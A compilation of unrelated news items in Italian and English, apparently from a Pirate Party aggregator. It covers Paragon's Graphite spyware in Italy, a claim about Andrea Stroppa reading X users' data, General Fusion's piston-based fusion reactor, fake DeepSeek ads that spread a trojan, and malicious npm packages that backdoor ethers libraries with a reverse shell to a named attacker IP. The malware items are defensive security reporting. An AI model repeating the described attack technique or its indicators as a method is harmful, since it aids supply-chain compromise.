L’uso di Graphite, uno spyware di livello militare altamente invasivo sviluppato dalla Paragon Solutions di Israele, sarebbe stato imposto dal fatto che all’epoca era l’unico strumento a disposizione dei servizi segreti. La questione di chi sorvegliasse Cancellato resta irrisolta. Il governo continua a negare il coinvolgimento dell’intelligence, mentre le indagini di cinque procure italiane – Napoli, Roma, Venezia, Bologna e Palermo – non hanno finora prodotto risposte definitive.
Per ora, il governo ha sospeso i contratti con Paragon finché il Copasir non avrà completato le sue indagini. Si prevede che Copasir concluda presto la sua inchiesta, dopodiché presenterà i suoi risultati al Parlamento. Nel frattempo, un’altra indagine chiave è in corso presso Citizen Lab, un gruppo di ricerca sulla sicurezza informatica presso l’Università di Toronto, che sta analizzando i dispositivi delle persone prese di mira per determinare come Graphite si sia infiltrata nei loro telefoni.
The internet is flooded with AI-generated images in the style of Studio Ghibli, whose founder said “I would never wish to incorporate this technology into my work at all.”#News
The story of Andrea #Stroppa who, as a shareholder of X, boasts of being able to read its private messages, is told by @Claudia Giulia The journalist noticed Stroppa's "gaffe" during a "space" live broadcast and reported it to the Italian Data Protection Authority
It’s Saturday, March 22, 2025. I’m getting ready to head out and take one last look at Twitter. At the top of the screen, I spot a Spaces session featuring Andrea Stroppa, a key figure in Elon Musk’s orbit, with a prominent role in Europe, especially Italy. I hesitate, but then I notice some journalists I admire - people I’ve connected with on the platform - among the listeners. Curiosity wins out, and I join. Nicola Porro is interviewing Stroppa: they’re talking about Twitter X, Musk, and Tesla. Then my connection drops, I have to leave, and I close the app. The next day, I return to the audio: it’s still there, recorded on the platform, now heard by thousands. I pick up where I left off. At the 32-minute mark, Stroppa says something that stops me cold. I rewind and listen again. I can’t believe it. In a fleeting moment - maybe a lapse - he drops a bombshell: thanks to his role as a shareholder, he can uncover the identity of any user on X, specifically mentioning anonymous accounts that criticize him. It’s a stark claim, impossible to brush off.
It’s rarely appreciated just how much more complicated nuclear fusion is than nuclear fission. Whereas the latter involves a process that happens all around us without any human involvement, and where the main challenge is to keep the nuclear chain reaction within safe bounds, nuclear fusion means making atoms do something that goes against their very nature, outside of a star’s interior.
Fusing helium isotopes can be done on Earth fairly readily these days, but doing it in a way that’s repeatable — bombs don’t count — and in a way that makes economical sense is trickier. As covered previously, plasma stability is a problem with the popular approach of tokamak-based magnetic confinement fusion (MCF). Although this core problem has now been largely addressed, and stellarators are mostly unbothered by this particular problem, a Canadian start-up figures that they can do even better, in the form of a nuclear fusion reactors based around the principle of magnetized target fusion (MTF).
Although General Fusion’s piston-based fusion reactor has people mostly very confused, MTF is based on real physics and with GF’s current LM26 prototype having recently achieved first plasma, this seems like an excellent time to ask the question of what MTF is, and whether it can truly compete billion-dollar tokamak-based projects.
Squishing Plasma Toroids
Lawson criterion of important magnetic confinement fusion experiments (Credit: Horvath, A., 2016) In general, to achieve nuclear fusion, the target atoms have to be pushed past the Coulomb barrier, which is an electrostatic interaction that normally prevents atoms from approaching each other and even spontaneously fusing. In stars, the process of nucleosynthesis is enabled by the intense pressures due to the star’s mass, which overcomes this electrostatic force.
Replicating the nuclear fusion process requires a similar way to overcome the Coulomb barrier, but in lieu of even a small-sized star like our Sun, we need alternate means such as much higher temperatures, alternative ways to provide pressure and longer confinement times. The efficiency of each approach was originally captured in the Lawson criterion, which was developed by John D. Lawson in a (then classified) 1955 paper (PDF on Archive.org).
In order to achieve a self-sustaining fusion reaction, the energy losses should be less than the energy produced by the reaction. The break-even point here is expressed as having a Q (energy gain factor) of 1, where the added energy and losses within the fusion process are in balance. For sustained fusion with excess energy generation, the Q value should be higher than 1, typically around 5 for contemporary fuels and fusion technology.
In the slow march towards ignition, we have seen many reports in the popular media that turn out to be rather meaningless, such as the horrendous inefficiency demonstrated by the laser-based inertial confinement fusion (ICF) at the National Ignition Facility (NIF). This makes it rather fascinating that what General Fusion is attempting is closer to ICF, just without the lasers and artisan Hohlraum-based fuel pellets.
Instead they use a plasma injector, a type of plasma railgun called a Marshall gun, that produces hydrogen isotope plasma, which is subsequently contained in a magnetic field as a self-stable compact toroid. This toroid is then squished by a mechanical system in a matter of milliseconds, with the resulting compression induces fusion. Creating this toroid is the feat that was recently demonstrated in the current Lawson Machine 26 (LM26) prototype reactor with its first plasma in the target chamber.
Magneto-Inertial Fusion
Whereas magnetic confinement fusion does effectively what it says on the tin, magnetic target fusion is pretty much a hybrid of magnetic confinement fusion and the laser-based intertial confinement fusion. Because the magnetic containment is only there to essentially keep the plasma in a nice stable toroid, it doesn’t have nearly the same requirements as in a tokamak or stellarator. Yet rather than using complex and power-hungry lasers, MCF applies mechanical energy using an impulse driver — the liner — that rapidly compresses the low-density plasma toroid. Schematic of the Lawson Machine 26 MTF reactor. (Credit: General Fusion) The juiciest parts of General Fusion’s experimental setup can be found in the Research Library on the GF website. The above graphic was copied from the LM26 poster (PDF), which provides a lot of in-depth information on the components of the device and its operation, as well as the experiments that informed its construction.
The next step will be to test the ring compressor that is designed to collapse the lithium liner around the plasma toroid, compressing it and achieving fusion.
Long Road Ahead
Interpretation of General Fusion’s commercial MTF reactor design. (Credit: Evan Mason) As promising this may sound, there is still a lot of work to do before MTF can be considered a viable option for commercial fusion. As summarized on the Wikipedia entry for General Fusion, the goal is to have a liquid liner rather than the solid lithium liner of LM26. This liquid lithium liner will both breed new tritium fuel from neutron exposure, as well as provide the liner that compresses the deuterium-tritium fuel.
This liquid liner would also provide cooling, linked with a heat exchanger or steam generator to generate electricity. Because the liquid liner would be infinitely renewable, it should allow for about 1 cycle per second. To keep the liquid liner in place on the inside of the sphere, it would need to be constantly spun, further complicating the design.
Although getting plasma in the reaction chamber where it can be squished by the ring compressor’s lithium liner is a major step, the real challenge will be in moving from a one-cycle-a-day MTF prototype to something that can integrate not only the aforementioned features, but also run one cycle per second, while being more economical to run than tokamaks, stellarators, or even regular nuclear fission plants, especially Gen IV fast neutron reactors.
That said, there is a strong argument to be made that MTF is significantly more practical for commercial power generation than ICF. And regardless, it is just really cool science and engineering.
Top image: General Fusion’s Lawson Machine 26. (Credit: General Fusion)
La rapida crescita della popolarità di DeepSeek, in mezzo alle controversie sulla privacy, ha attirato l’attenzione non solo degli utenti, ma anche dei criminali informatici. Sono comparsi online falsi annunci pubblicitari camuffati da risultati di ricerca ufficiali di Google nel tentativo di diffondere malware. Gli aggressori prendevano di mira coloro che digitavano query in un motore di ricerca e cliccavano distrattamente sui primi link.
Secondo la ricerca degli specialisti di Malwarebytes, Google Ads ospita attivamente annunci falsi che si spacciano per DeepSeek. A prima vista, le differenze rispetto al risultato reale sono difficili da rilevare, soprattutto per un utente inesperto. Basta cliccare su un link del genere per arrivare a un sito falso, creato con particolare attenzione all’autenticità visiva.
Uno di questi siti copia completamente l’aspetto del DeepSeek ufficiale, ma in realtà porta al download di un Trojan scritto in MSIL (Microsoft Intermediate Language). Il codice dannoso viene attivato quando si tenta di scaricare il “motore di ricerca” e viene avviato sul sistema della vittima. Sito web falso DeepSeek (Malwarebytes)
I criminali contano sulla credibilità dei risultati sponsorizzati su Google. Il sistema consente a tali annunci di occupare le prime posizioni, superando persino i siti web ufficiali dei marchi. Ciò rende la pubblicità falsa particolarmente pericolosa. I truffatori pagano somme considerevoli per il piazzamento, il che dimostra l’elevata efficacia dell’inganno.
Uno dei siti falsi è stato creato a nome di un inserzionista il cui nome è scritto in ebraico: תמיר כץ. Questo è un altro campanello d’allarme: tali dettagli sono difficili da notare in fretta, soprattutto se l’utente non sa come dovrebbe apparire un vero annuncio DeepSeek. Informazioni sull’inserzionista di malware (Malwarebytes)
Per prevenire il contagio, gli esperti consigliano di evitare completamente di cliccare sui link sponsorizzati. Inoltre, si consiglia di cliccare sui tre puntini accanto all’URL nei risultati di ricerca: in questo modo è possibile scoprire chi è il proprietario dell’annuncio. Se hai dubbi sul nome dell’inserzionista, è meglio tornare ai risultati di ricerca normali. Annunci falsi (in alto) e veri DeepSeek (in basso) (Malwarebytes)
Per bloccare completamente i link sponsorizzati, puoi installare un adblocker. In questo modo si eliminerà il rischio di visitare accidentalmente un sito dannoso. In una situazione in cui Google non può garantire la sicurezza degli annunci pubblicitari, tali misure diventano particolarmente rilevanti.
Oggi, giovedì 27 marzo ci sarà l’evento di presentazione del quadrimestrale di Startmag, “Passaggio a Sud Est” dalle 15:30 alle 16:30 sarà presente Renata Gravina per conto della Fondazione. La Fondazione Luigi Einaudi di Roma ha contribuito al
Gli aggressori hanno introdotto una nuova tattica negli attacchi all’ecosistema npm: due pacchetti dannosi modificano segretamente librerie legittime già installate sul sistema per incorporare una reverse shell e fornire un accesso persistente al sistema della vittima. Anche dopo la rimozione dei pacchetti dannosi, la backdoor continua a funzionare perché è nascosta in una versione modificata di un pacchetto attendibile.
I ricercatori di Reversing Labs hanno studiato le catene di fornitura del software. Sebbene le librerie dannose non siano ancora diffuse, i ricercatori mettono in guardia dal pericolo che rappresentano. Secondo loro, di tanto in tanto su npm compaiono dei malware loader, anche se gli infostealer sono più comuni. In questo caso, però, è stata utilizzata una strategia particolarmente sofisticata per nascondere il payload dannoso, che merita un’attenzione particolare.
I pacchetti scoperti si chiamano “ethers-provider2” e “ethers-providerz”. Il primo di questi, che era ancora disponibile su npm al momento della pubblicazione, si basa sulla popolare libreria “ssh2“. Ma a differenza dell’originale, ha uno script di installazione modificato “install.js”. Una volta caricato, lo script scarica la seconda fase del codice dannoso da una fonte esterna, la esegue e poi la elimina, cercando di non lasciare tracce.
La seconda fase del malware controlla se il famoso pacchetto “ethers” è installato sul sistema. In caso affermativo, sostituisce il file provider-jsonrpc.js con una versione modificata che contiene malware. Questo codice, a sua volta, si connette all’host remoto, da dove viene caricata la terza fase: una reverse shell completamente funzionale. La sua implementazione si basa su un client SSH modificato che si maschera da comportamento legittimo della libreria ssh2.
La che la rimozione di “ethers-provider2” non rimuove la backdoor: il file infetto nella libreria ethers rimane attivo. Ciò significa che il sistema dell’utente rimane compromesso anche se il modulo dannoso non è più installato.
Il secondo malware, “ethers-providerz”, funziona in modo simile, ma prende di mira un altro modulo popolare: @ethersproject/providers. Inietta inoltre un payload dannoso nella libreria legittima e installa una reverse shell che punta allo stesso indirizzo IP dell’attaccante: 5[.]199[.]166[.]1:31337.
Secondo Reversing Labs, le prime versioni di “ethers-providerz” contenevano errori nei percorsi dei file, che impedivano il funzionamento dell’attacco. Tuttavia, l’autore ha già rimosso il pacchetto da npm, il che potrebbe indicare l’intenzione di migliorarlo e ripubblicarlo. Durante l’indagine, gli esperti hanno anche identificato due pacchetti aggiuntivi, “reproduction-hardhat” e “@theoretical123/providers”, che potrebbero essere correlati alla stessa campagna dannosa.
Per rilevare le minacce, Reversing Labs ha pubblicato regola YARA, progettate per identificare i componenti malware noti. Si consiglia agli sviluppatori di controllare i propri ambienti e di assicurarsi che non vi siano segni di compromissione.
Gli analisti sottolineano l’importanza di controllare il codice sorgente e l’affidabilità degli sviluppatori quando si installano pacchetti da repository pubblici come npm o PyPI. Prestare particolare attenzione al codice offuscato, alle connessioni esterne e alle azioni sospette negli script di installazione.
CubitOom
in reply to The Pirate Post • • •Its a private platform. They can do what ever they want.
Politicians and other public services should stop using it while they still can.
informapirata ⁂
in reply to The Pirate Post • • •informapirata ⁂
in reply to The Pirate Post • • •